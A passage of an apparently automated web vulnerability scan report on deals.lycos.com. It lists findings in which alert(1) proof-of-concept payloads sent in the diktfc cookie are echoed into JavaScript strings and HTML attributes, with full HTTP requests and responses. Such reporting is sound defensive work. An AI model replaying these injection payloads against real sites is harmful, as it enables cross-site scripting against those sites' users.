1.300. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1fcd"%3balert(1)//17153ed5472 was submitted in the diktfc cookie. This input was echoed as d1fcd";alert(1)//17153ed5472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/televisions-159 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad1fcd"%3balert(1)//17153ed5472; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/televisions-159",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad1fcd";alert(1)//17153ed5472"
});
</script>
...[SNIP]...

1.301. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68ab0"%3balert(1)//e4a4a2514b6 was submitted in the diktfc cookie. This input was echoed as 68ab0";alert(1)//e4a4a2514b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/travel-and-entertainment-206 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A68ab0"%3balert(1)//e4a4a2514b6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/travel-and-entertainment-206",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A68ab0";alert(1)//e4a4a2514b6"
});
</script>
...[SNIP]...

1.302. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c1d"><script>alert(1)</script>7cb04211ed3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/travel-and-entertainment-206 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A98c1d"><script>alert(1)</script>7cb04211ed3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/travel-and-entertainment-206&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A98c1d"><script>alert(1)</script>7cb04211ed3&amp;cj=1" alt="tracker" />
...[SNIP]...

1.303. http://deals.lycos.com/deals/stores [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bc0"><script>alert(1)</script>c7e153dfa56 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac5bc0"><script>alert(1)</script>c7e153dfa56; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac5bc0"><script>alert(1)</script>c7e153dfa56&amp;cj=1" alt="tracker" />
...[SNIP]...

1.304. http://deals.lycos.com/deals/stores [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b302d"%3balert(1)//2f566655819 was submitted in the diktfc cookie. This input was echoed as b302d";alert(1)//2f566655819 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab302d"%3balert(1)//2f566655819; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab302d";alert(1)//2f566655819"
});
</script>
...[SNIP]...

1.305. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/6pm-1460

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5859"%3balert(1)//b6205f25b94 was submitted in the diktfc cookie. This input was echoed as f5859";alert(1)//b6205f25b94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/6pm-1460 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af5859"%3balert(1)//b6205f25b94; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:16 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/6pm-1460",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af5859";alert(1)//b6205f25b94"
});
</script>
...[SNIP]...

1.306. http://deals.lycos.com/deals/stores/6pm-1460 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/6pm-1460

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7962"><script>alert(1)</script>516615919cc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/6pm-1460 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/6pm-1460&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab7962"><script>alert(1)</script>516615919cc&amp;cj=1" alt="tracker" />
...[SNIP]...

1.307. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/best-buy-560

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3978b"%3balert(1)//cc36d6b749a was submitted in the diktfc cookie. This input was echoed as 3978b";alert(1)//cc36d6b749a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/best-buy-560 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3978b"%3balert(1)//cc36d6b749a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:38 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:38 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/best-buy-560",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3978b";alert(1)//cc36d6b749a"
});
</script>
...[SNIP]...

1.308. http://deals.lycos.com/deals/stores/best-buy-560 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/best-buy-560

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd064"><script>alert(1)</script>f8d80f801a2 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/best-buy-560 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd064"><script>alert(1)</script>f8d80f801a2; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:36 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/best-buy-560&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd064"><script>alert(1)</script>f8d80f801a2&amp;cj=1" alt="tracker" />
...[SNIP]...

1.309. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2630"%3balert(1)//4cb7f0b56a was submitted in the diktfc cookie. This input was echoed as d2630";alert(1)//4cb7f0b56a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores/buy-com-233 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad2630"%3balert(1)//4cb7f0b56a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/stores/buy-com-233",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad2630";alert(1)//4cb7f0b56a"
});
</script>
...[SNIP]...

1.310. http://deals.lycos.com/deals/stores/buy-com-233 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/buy-com-233

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f2c"><script>alert(1)</script>8b3b9fa5add was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores/buy-com-233 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A94f2c"><script>alert(1)</script>8b3b9fa5add; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores/buy-com-233&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A94f2c"><script>alert(1)</script>8b3b9fa5add&amp;cj=1" alt="tracker" />
...[SNIP]...

1.311. http://deals.lycos.com/deals/stores/dell-home-638 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores/dell-home-638

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd3f3"><script>alert(1)</script>6d94b7cd86b was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

